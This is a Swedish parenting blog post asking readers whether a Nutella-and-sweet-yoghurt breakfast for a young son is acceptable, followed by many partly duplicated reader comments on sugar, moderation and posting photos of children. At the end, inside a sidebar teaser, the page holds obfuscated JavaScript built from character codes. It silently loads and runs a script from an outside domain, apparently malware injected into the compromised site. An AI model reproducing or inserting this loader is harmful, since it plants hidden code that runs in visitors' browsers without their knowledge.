Rätt eller fel? Sockerbomb!

IMG_3090

Sovmorgon & Sockerbomb!

hej fina! Sovmorgon deluxe!

Lilleman sov till 09:30!?! HUR ska detta sluta i tonåren? 😂🙈 Lilleman fick köpa nutella häromdagen…

(jag gav vika och orkade inte ta striden 😫) Så denna frukost hade han längtat efter hela veckan… han fick rostat bröd, (=socker)

Han fick jordgubbs-Yoggi ( =socker)

…sen fick han sin efterlängtade nutella på mackan 🙈

( =sjukt mycket socker)  Hur det du på denna sockerbomb? Rätt eller fel? Jag tycker att nån gång ibland är helt okay.. till mitt försvar så borstade vi tänderna JÄTTE noga efteråt! ☺️

Let Me know, rätt eller fel? 

OLYMPUS DIGITAL CAMERA

kramis /My Martens

61 Komentarer

  • Finns det väl visst? Att socker inte är särskilt bra för hälsan är ju vetenskapligt bevisat. MEN- allt med måtta.

  • Håller med! Härifrån sydEuropa är er frukost rena hälsokicken;) Tycker ni båda ska njuta av Nutella och yoghurt! Det gör iaf jag;)

 1. Det är varken rätt eller fel.
  Men är ju bra att hålla igen på sockret i veckorna.
  Barn brukar kunna äta det dom behöver.
  Är vi vuxna som påvärkar dom både negativt och positivt.
  Ha nu en härlig helg.
  Kram L

 2. Om det inte är varje morgon så ser inte jag något fel att barn får äta lite onyttigt.
  Min grabb äter nyttigt på vardagarna för att på helgen, om han själv vill, äta vad han tycker.

  • Finns det väl visst? Att socker inte är särskilt bra för hälsan är ju vetenskapligt bevisat. MEN- allt med måtta.

  • Håller med! Härifrån sydEuropa är er frukost rena hälsokicken;) Tycker ni båda ska njuta av Nutella och yoghurt! Det gör iaf jag;)

 3. Det är varken rätt eller fel.
  Men är ju bra att hålla igen på sockret i veckorna.
  Barn brukar kunna äta det dom behöver.
  Är vi vuxna som påvärkar dom både negativt och positivt.
  Ha nu en härlig helg.
  Kram L

 4. Men nog vet du att det inte är tänderna som tar mest stryk?
  Det är ju vad sockret gör inuti kroppen.
  Och att sockret ger ett behov av mer mer mer…
  Det är ju vi vuxna som låter socker bli det som vi kallar ”mys”
  Jag tror du vet, du har väl läst om sånt här?

 5. Om det inte är varje morgon så ser inte jag något fel att barn får äta lite onyttigt.
  Min grabb äter nyttigt på vardagarna för att på helgen, om han själv vill, äta vad han tycker.

 6. Hej! Har aldrig gett mina barn choklad, nutella alltså på en smörgås.
  Ingen bra kombo. Men man gör som man vill. ?

 7. Men nog vet du att det inte är tänderna som tar mest stryk?
  Det är ju vad sockret gör inuti kroppen.
  Och att sockret ger ett behov av mer mer mer…
  Det är ju vi vuxna som låter socker bli det som vi kallar ”mys”
  Jag tror du vet, du har väl läst om sånt här?

 8. Man skapar sina egna rätt ovh fel! Men personligen så tycker jag att det är bra att vägleda barnen till bra val tidigt i livet. Mina barn får socker men mer i form av rent godis.. inte till frukost. Då äter de fil och smörgås (visst lite socker i det) men aldrig oboy, nutella osv. Juice endast på helger och då bra val. Mina barn älskar som tur är grönsaker, frukt och bär. Men kanske är det för att vi erbjudit det i mängder redan tidigt!

 9. Förstår dig! Kan tänka mig det är svårt som halvtidsförälder att ha hårda regler eller rutiner (missförstå inte, självklart är man alltid mamma men menar delad vårdnad) jag skulle själv falla för önskemål oftare om jag var du. Låt han njuta ?

 10. Hej! Har aldrig gett mina barn choklad, nutella alltså på en smörgås.
  Ingen bra kombo. Men man gör som man vill. 🙂

 11. Eftersom vi äter godis/choklad på helgen så känns det ju helt galet att börja dagen med så mycket socker redan till frukost. Finns ju inget bra med socker så nej här i detta hemmet skulle det aldrig serveras så mycket socker till frukost. Nu gillar inte min son nutella tack och lov men jag skulle ändå aldrig servera det som pålägg till frukostmackan. Sen gillar han inte Yoggi eller annan söt yoghurt utan föredrar naturell yoghurt som serverar med färsk frukt.
  Självklart gör man som man vill men jag tycker det är viktigt att man startar dagen med mer näringsrik och nyttig frukost.

 12. Man skapar sina egna rätt ovh fel! Men personligen så tycker jag att det är bra att vägleda barnen till bra val tidigt i livet. Mina barn får socker men mer i form av rent godis.. inte till frukost. Då äter de fil och smörgås (visst lite socker i det) men aldrig oboy, nutella osv. Juice endast på helger och då bra val. Mina barn älskar som tur är grönsaker, frukt och bär. Men kanske är det för att vi erbjudit det i mängder redan tidigt!

 13. Förstår dig! Kan tänka mig det är svårt som halvtidsförälder att ha hårda regler eller rutiner (missförstå inte, självklart är man alltid mamma men menar delad vårdnad) jag skulle själv falla för önskemål oftare om jag var du. Låt han njuta 🙂

 14. Eftersom vi äter godis/choklad på helgen så känns det ju helt galet att börja dagen med så mycket socker redan till frukost. Finns ju inget bra med socker så nej här i detta hemmet skulle det aldrig serveras så mycket socker till frukost. Nu gillar inte min son nutella tack och lov men jag skulle ändå aldrig servera det som pålägg till frukostmackan. Sen gillar han inte Yoggi eller annan söt yoghurt utan föredrar naturell yoghurt som serverar med färsk frukt.
  Självklart gör man som man vill men jag tycker det är viktigt att man startar dagen med mer näringsrik och nyttig frukost.

 15. Det beror ju på hela situationen kan jag tänka? Så jäkla mycket socker som mina ungar vräkt i sig på helgen då jag aldrig snålat med lördagsgodis och de själva varit på affären som låg nära med någon kompis och rätt vad det är kommer mormor o morfar med Godis och fika på lördagen och kanske nån kompis som sover över spontant och snälla föräldrar skickar med chips eller godis inte optimalt men så var det hos oss. Med facit i hand, ja båda äter godis fortfarande fastän dottern är PT, boxas och är boxningstränare, springer maror,bestiger Kebnekajse mm. Sonen tränar,boxas mm. och ingen utav dem tackar nej till kladdkaka eller choklad. Jag har aldrig inför mina barn bantat (fastän jag har gjort det eller rättaresagt hållt in) aldrig tvingat dem att gå med i någon sport men uppmuntrat dem då dem velat, alltid talat om att de är älskade. Men jag kan inte påstå att mina barn blivit sockerrusiga som alla pratar om, jag har aldrig märkt någon skillnad. Anl. till att jag var så anti kroppsprat är för att min mamma varit en ständig bantare jag minns sådant sedan jag var liten, min pappa tävlade i sin tids kraftsport, mina syskon varit så fruktansvärt kroppsfixerade så jag bara ville inte. Nu äter mina barn sunt och jag har serverat dem hemlagad mat dvs. husmanskost och nu är vi alla väldigt medvetna om att vi äter ekologiskt och bra mat, de bor inte hemma längre men vi brukar dela på en ekolåda i månaden via en jordbrukare vi känner. Så det var långt mer än din fråga *S* men funkar det för Ludvig och dig så undrar jag varför det skulle vara bättre att avsluta en dag i bland med sött än att börja en dag i bland med sött?

 16. Det beror ju på hela situationen kan jag tänka? Så jäkla mycket socker som mina ungar vräkt i sig på helgen då jag aldrig snålat med lördagsgodis och de själva varit på affären som låg nära med någon kompis och rätt vad det är kommer mormor o morfar med Godis och fika på lördagen och kanske nån kompis som sover över spontant och snälla föräldrar skickar med chips eller godis inte optimalt men så var det hos oss. Med facit i hand, ja båda äter godis fortfarande fastän dottern är PT, boxas och är boxningstränare, springer maror,bestiger Kebnekajse mm. Sonen tränar,boxas mm. och ingen utav dem tackar nej till kladdkaka eller choklad. Jag har aldrig inför mina barn bantat (fastän jag har gjort det eller rättaresagt hållt in) aldrig tvingat dem att gå med i någon sport men uppmuntrat dem då dem velat, alltid talat om att de är älskade. Men jag kan inte påstå att mina barn blivit sockerrusiga som alla pratar om, jag har aldrig märkt någon skillnad. Anl. till att jag var så anti kroppsprat är för att min mamma varit en ständig bantare jag minns sådant sedan jag var liten, min pappa tävlade i sin tids kraftsport, mina syskon varit så fruktansvärt kroppsfixerade så jag bara ville inte. Nu äter mina barn sunt och jag har serverat dem hemlagad mat dvs. husmanskost och nu är vi alla väldigt medvetna om att vi äter ekologiskt och bra mat, de bor inte hemma längre men vi brukar dela på en ekolåda i månaden via en jordbrukare vi känner. Så det var långt mer än din fråga *S* men funkar det för Ludvig och dig så undrar jag varför det skulle vara bättre att avsluta en dag i bland med sött än att börja en dag i bland med sött?

 17. En svala gör ingen sommar….heter det. Om det blir sockerbomb till helgen är det då inte hela världen. Njut av nutellamackan, Lilleman!

 18. Inte hela världen. Man får välja sina strider, som det heter. Inget som jag tror någon skulle må bra av att äta varje dag, men ibland, som du säger.
  Jag tror inte på förbud, varken för vuxna eller barn. Förbjuden frukt osv. Till och med de gamla grekerna sa ”allt med måtta” och det stämmer så himla bra! Lagom med träning, lagom med arbete, lagom med nästan allt är bäst. Det enda man inte kan få för mycket av är väl kärlek. ?

 19. En svala gör ingen sommar….heter det. Om det blir sockerbomb till helgen är det då inte hela världen. Njut av nutellamackan, Lilleman!

 20. Men herregud människa du matar ju honom med bara socker och skräpmat!
  är ju på varje bild av grabben skräpmat samt massa sötsaker….

 21. Tycker att man kan festa till frukosten lite hur man vill på helgerna man behöver ju inte dricka läsk till frukost direkt haha. Ha en fin söndag. Kram?

 22. Inte hela världen. Man får välja sina strider, som det heter. Inget som jag tror någon skulle må bra av att äta varje dag, men ibland, som du säger.
  Jag tror inte på förbud, varken för vuxna eller barn. Förbjuden frukt osv. Till och med de gamla grekerna sa ”allt med måtta” och det stämmer så himla bra! Lagom med träning, lagom med arbete, lagom med nästan allt är bäst. Det enda man inte kan få för mycket av är väl kärlek. 💕

 23. Men herregud människa du matar ju honom med bara socker och skräpmat!
  är ju på varje bild av grabben skräpmat samt massa sötsaker….

 24. Tycker att man kan festa till frukosten lite hur man vill på helgerna man behöver ju inte dricka läsk till frukost direkt haha. Ha en fin söndag. Kram💞

 25. Hur tänker du kring att lägga ut så mycket bilder på Ludvig när hon är avklädd? Är han ok med det själv?
  Har en dotter på 6 år men skulle inte lägga ut detta på henne på en sådan, relativt, stor blogg. Ta det inte som kritik, är bara nyfiken hur du tänker kring det.

  • Ett barn i kalsonger ? Badbyxor/bikini. jag tycker att det är mer än okay =) OM någon skulle se något olämpligt eller sexistiskt i det (typ en peddo) så säger sett ganska mycket om personens psykiska tillstånd..

 26. Hur tänker du kring att lägga ut så mycket bilder på Ludvig när hon är avklädd? Är han ok med det själv?
  Har en dotter på 6 år men skulle inte lägga ut detta på henne på en sådan, relativt, stor blogg. Ta det inte som kritik, är bara nyfiken hur du tänker kring det.

  • Ett barn i kalsonger ? Badbyxor/bikini. jag tycker att det är mer än okay =) OM någon skulle se något olämpligt eller sexistiskt i det (typ en peddo) så säger sett ganska mycket om personens psykiska tillstånd..

 27. Mina barn får äta precis det dom vill, denna sockerhets är helt vansinnig! Självklart äter dom inte ren strösocker eller godis varje dag men kom igen, det är socker i precis allt du äter. Någon form av det iaf.

 28. Mina barn får äta precis det dom vill, denna sockerhets är helt vansinnig! Självklart äter dom inte ren strösocker eller godis varje dag men kom igen, det är socker i precis allt du äter. Någon form av det iaf.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/